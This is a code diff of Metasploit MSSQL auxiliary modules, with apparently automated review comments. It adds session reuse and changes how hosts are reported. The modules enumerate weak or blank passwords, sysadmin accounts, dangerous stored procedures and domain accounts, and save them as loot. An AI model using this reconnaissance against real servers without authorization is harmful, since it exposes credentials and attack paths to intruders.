if sysconfig['c2 audit mode'] == 1
|
||||
print_status("\tC2 Audit Mode is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "C2 Audit Mode is Enabled")
|
||||
else
|
||||
print_status("\tC2 Audit Mode is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "C2 Audit Mode is Not Enabled")
|
||||
end
|
||||
@@ -90,16 +94,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['xp_cmdshell'] == 1
|
||||
print_status("\txp_cmdshell is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Enabled")
|
||||
else
|
||||
print_status("\txp_cmdshell is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Not Enabled")
|
||||
end
|
||||
@@ -107,16 +111,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
xpspexist = mssql_query("select sysobjects.name from sysobjects where name = \'xp_cmdshell\'")[:rows]
|
||||
if xpspexist != nil
|
||||
print_status("\txp_cmdshell is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Enabled")
|
||||
else
|
||||
print_status("\txp_cmdshell is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "xp_cmdshell is Not Enabled")
|
||||
end
|
||||
@@ -126,16 +130,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
# check if remote access is enabled
|
||||
if sysconfig['remote access'] == 1
|
||||
print_status("\tremote access is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "remote access is Enabled")
|
||||
else
|
||||
print_status("\tremote access is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "remote access is not Enabled")
|
||||
end
|
||||
@@ -144,16 +148,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
#check if updates are allowed
|
||||
if sysconfig['allow updates'] == 1
|
||||
print_status("\tallow updates is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "allow updates is Enabled")
|
||||
else
|
||||
print_status("\tallow updates is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "allow updates is not Enabled")
|
||||
end
|
||||
@@ -163,16 +167,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Database Mail XPs'] == 1
|
||||
print_status("\tDatabase Mail XPs is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is Enabled")
|
||||
else
|
||||
print_status("\tDatabase Mail XPs is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is not Enabled")
|
||||
end
|
||||
@@ -180,16 +184,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
mailexist = mssql_query("select sysobjects.name from sysobjects where name like \'%mail%\'")[:rows]
|
||||
if mailexist != nil
|
||||
print_status("\tDatabase Mail XPs is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is Enabled")
|
||||
else
|
||||
print_status("\tDatabase Mail XPs is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database Mail XPs is not Enabled")
|
||||
end
|
||||
@@ -200,16 +204,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Ole Automation Procedures'] == 1
|
||||
print_status("\tOle Automation Procedures are Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are Enabled")
|
||||
else
|
||||
print_status("\tOle Automation Procedures are Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are not Enabled")
|
||||
end
|
||||
@@ -217,16 +221,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
oleexist = mssql_query("select sysobjects.name from sysobjects where name like \'%sp_OA%\'")[:rows]
|
||||
if oleexist != nil
|
||||
print_status("\tOle Automation Procedures is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are Enabled")
|
||||
else
|
||||
print_status("\tOle Automation Procedures are Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Ole Automation Procedures are not Enabled")
|
||||
end
|
||||
@@ -245,9 +249,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if db_ind_files != nil
|
||||
db_ind_files.each do |fn|
|
||||
print_status("\t\t#{fn.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database: #{dbn.strip} File: #{fn.join}")
|
||||
end
|
||||
@@ -257,9 +261,9 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if db_ind_files != nil
|
||||
db_ind_files.each do |fn|
|
||||
print_status("\t\t#{fn.join.strip}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database: #{dbn.strip} File: #{fn.join}")
|
||||
end
|
||||
@@ -279,17 +283,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if syslogins != nil
|
||||
syslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Database: Master User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_error("\tCould not enumerate System Logins!")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Could not enumerate System Logins")
|
||||
end
|
||||
@@ -302,17 +306,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if disabledsyslogins != nil
|
||||
disabledsyslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Disabled User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Disabled Logins Found")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Disabled Logins Found")
|
||||
end
|
||||
@@ -326,17 +330,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if nopolicysyslogins != nil
|
||||
nopolicysyslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "None Policy Checked User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tAll System Accounts have the Windows Account Policy Applied to them.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "All System Accounts have the Windows Account Policy Applied to them")
|
||||
end
|
||||
@@ -350,17 +354,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if passexsyslogins != nil
|
||||
passexsyslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "None Password Expiration User: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tAll System Accounts are checked for Password Expiration.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "All System Accounts are checked for Password Expiration")
|
||||
end
|
||||
@@ -377,17 +381,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if sysadmins != nil
|
||||
sysadmins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Sysdba: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_error("\tCould not enumerate sysadmin accounts!")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Could not enumerate sysadmin accounts")
|
||||
end
|
||||
@@ -404,17 +408,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if winusers != nil
|
||||
winusers.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Windows Logins: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Windows logins found!")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Windows logins found")
|
||||
end
|
||||
@@ -431,17 +435,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if wingroups != nil
|
||||
wingroups.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Windows Groups: #{acc.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Windows Groups where found with permission to login to system.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Windows Groups where found with permission to login to system")
|
||||
|
||||
@@ -460,17 +464,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if sameasuser != nil
|
||||
sameasuser.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Username: #{up.join} Password: #{up.join}")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Account with its password being the same as its username was found.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Account with its password being the same as its username was found")
|
||||
end
|
||||
@@ -488,17 +492,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
if blankpass != nil
|
||||
blankpass.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Username: #{up.join} Password: EMPTY ")
|
||||
end
|
||||
else
|
||||
print_status("\tNo Accounts with empty passwords where found.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Accounts with empty passwords where found")
|
||||
end
|
||||
@@ -713,18 +717,18 @@ EOS
|
||||
fountsp.each do |strp|
|
||||
if dangeroussp.include?(strp.strip)
|
||||
print_status("\t#{strp.strip}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Stored Procedures with Public Execute Permission #{strp.strip}")
|
||||
end
|
||||
end
|
||||
else
|
||||
print_status("\tNo Dangerous Stored Procedure found with Public Execute.")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "No Dangerous Stored Procedure found with Public Execute")
|
||||
end
|
||||
@@ -756,9 +760,9 @@ EOS
|
||||
instances.each do |i|
|
||||
print_status("\t#{i}")
|
||||
instancenames << i.strip
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Instance Name: #{i}")
|
||||
end
|
||||
@@ -773,9 +777,9 @@ EOS
|
||||
if privdflt != nil
|
||||
privdflt.each do |priv|
|
||||
print_status("\t#{priv[1]}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Default Instance SQL Server running as: #{priv[1]}")
|
||||
end
|
||||
@@ -792,9 +796,9 @@ EOS
|
||||
print_status("Instance #{i} SQL Server Service is running under the privilege of:")
|
||||
privinst.each do |p|
|
||||
print_status("\t#{p[1]}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => mssql_client.address,
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:port => mssql_client.port,
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "#{i} Instance SQL Server running as: #{p[1]}")
|
||||
end
|
||||
|
||||
@@ -106,16 +106,16 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
# Create output file
|
||||
this_service = report_service(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:host => mssql_client.address,
|
||||
:port => mssql_client.port,
|
||||
:name => 'mssql',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
file_name = "#{datastore['RHOST']}-#{datastore['RPORT']}_windows_domain_accounts.csv"
|
||||
file_name = "#{mssql_client.address}-#{mssql_client.port}_windows_domain_accounts.csv"
|
||||
path = store_loot(
|
||||
'mssql.domain.accounts',
|
||||
'text/plain',
|
||||
datastore['RHOST'],
|
||||
mssql_client.address,
|
||||
windows_domain_login_table.to_csv,
|
||||
file_name,
|
||||
'Domain Users enumerated through SQL Server',
|
||||
|
||||
@@ -5,6 +5,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -23,13 +24,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
# Check connection and issue initial query
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_error('Login was unsuccessful. Check your credentials.')
|
||||
disconnect
|
||||
return
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
else
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
# Query for sysadmin status
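Review bot: The new `if session` branch in `run` calls `set_session(session.client)` and goes straight on to the sysadmin query without printing anything, while the login branch announces its target with `rhost`/`rport`. An operator reusing a session therefore gets no record of which server the module is about to query. I would add a status line to the session branch that names the client's own peer, for example `print_status("Using existing session to #{mssql_client.address}:#{mssql_client.port}")`, assuming `set_session` populates `mssql_client` as the reporting changes elsewhere in this commit suggest. The rest of `run` lies outside this hunk; if it calls `disconnect` at the end, as the failure path here does, confirm that this does not close a client owned by the session. The identical hunk in the next file (`@@ -22,14 +23,17 @@`) has the same gap.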
|
||||
|
||||
@@ -6,6 +6,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -22,14 +23,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
# Check connection and issue initial query
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_error('Login was unsuccessful. Check your credentials.')
|
||||
disconnect
|
||||
return
|
||||
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
|
||||
if mssql_login_datastore
|
||||
print_good('Connected.')
|
||||
else
|
||||
print_error("Login was unsuccessful. Check your credentials.")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
# Query for sysadmin status
|
||||
|
||||
@@ -5,6 +5,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
@@ -26,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||
[
|
||||
[ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
|
||||
[ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
|
||||
]
|
||||
],
|
||||
)
|
||||
)
|
||||
|
||||
@@ -37,7 +38,11 @@ class MetasploitModule < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
return unless mssql_login_datastore
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
return unless mssql_login_datastore
|
||||
end
|
||||
|
||||
technique = datastore['TECHNIQUE']
|
||||
case technique
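Review bot: A failed login in the new `else` branch of `run` exits silently, because `return unless mssql_login_datastore` prints nothing. Other modules in this commit report the same condition with `print_error('Login failed')` or `'Login was unsuccessful. Check your credentials.'`. Since the line is being moved anyway, I would make the failure visible: `unless mssql_login_datastore`, then `print_error('Login failed')` and `return`. The same silent return appears in the `@@ -337,16 +338,22 @@` hunk of the following file. `run` continues past the end of this hunk.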
|
||||
|
||||
@@ -4,9 +4,10 @@
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -337,16 +338,22 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
||||
# STATUSING
|
||||
print_line(" ")
|
||||
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
|
||||
|
||||
# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
|
||||
begin
|
||||
result = mssql_query(sql, false) if mssql_login_datastore
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_line(" ")
|
||||
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
|
||||
return unless mssql_login_datastore
|
||||
print_good("Successfully connected to #{mssql_client.address}:#{mssql_client.port}")
|
||||
end
|
||||
result = mssql_query(sql, false)
|
||||
|
||||
column_data = result[:rows]
|
||||
print_good("Successfully connected to #{rhost}:#{rport}")
|
||||
rescue
|
||||
print_error("Failed to connect to #{rhost}:#{rport}.")
|
||||
print_error("Failed to connect to #{rhost}:#{rport}")
|
||||
return
|
||||
end
|
||||
|
||||
@@ -436,8 +443,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
this_service = nil
|
||||
if framework.db and framework.db.active
|
||||
this_service = report_service(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:host => mssql_client.address,
|
||||
:port => mssql_client.port,
|
||||
:name => 'mssql',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
@@ -445,8 +452,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
# CONVERT TABLE TO CSV AND WRITE TO FILE
|
||||
if (save_loot=="yes")
|
||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlserver_query_results.csv"
|
||||
path = store_loot("mssql.data", "text/plain", datastore['RHOST'], sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)
|
||||
filename= "#{mssql_client.address}-#{mssql_client.port}_sqlserver_query_results.csv"
|
||||
path = store_loot("mssql.data", "text/plain", mssql_client.address, sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)
|
||||
print_good("Query results have been saved to: #{path}")
|
||||
end
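Review bot: The bare `rescue` in the `@@ -337,16 +338,22 @@` hunk now covers the session setup, the login, `mssql_query(sql, false)` and `result[:rows]`, yet its message is still `"Failed to connect to #{rhost}:#{rport}"`. A query error or a nil `result` would be reported as a connection failure. When an existing session is used, `rhost`/`rport` may also not describe the server the session is attached to; the visible reporting hunks switch to `mssql_client.address`/`mssql_client.port`, presumably for that reason. I would rescue a specific connection exception, as the `rescue Rex::ConnectionRefused => e` in a sibling module of this commit does, and include `#{e}` in the message so that other failures are not mislabelled. The enclosing method starts and ends outside the hunk.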
|
||||
|
||||
|
||||
@@ -14,6 +14,7 @@
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::OptionalSession::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@@ -86,12 +87,15 @@ class MetasploitModule < Msf::Auxiliary
|
||||
sql += "DEALLOCATE table_cursor "
|
||||
|
||||
begin
|
||||
if mssql_login_datastore
|
||||
result = mssql_query(sql, false)
|
||||
if session
|
||||
set_session(session.client)
|
||||
else
|
||||
print_error('Login failed')
|
||||
return
|
||||
unless mssql_login_datastore
|
||||
print_error('Login failed')
|
||||
return
|
||||
end
|
||||
end
|
||||
result = mssql_query(sql, false)
|
||||
rescue Rex::ConnectionRefused => e
|
||||
print_error("Connection failed: #{e}")
|
||||
return
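Review bot: The login guard inside the `begin` block is nested one level deeper than it needs to be: the `else` followed by `unless mssql_login_datastore … end` can be a single `elsif !mssql_login_datastore` arm with `print_error('Login failed')` and `return` under it. That keeps the session path and the login path at the same indentation and removes one `end`. Separately, `rescue Rex::ConnectionRefused => e` covers only a refused connection; whether timeouts or unreachable hosts are handled further down cannot be seen, because the method continues outside this hunk.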
|
||||
|
||||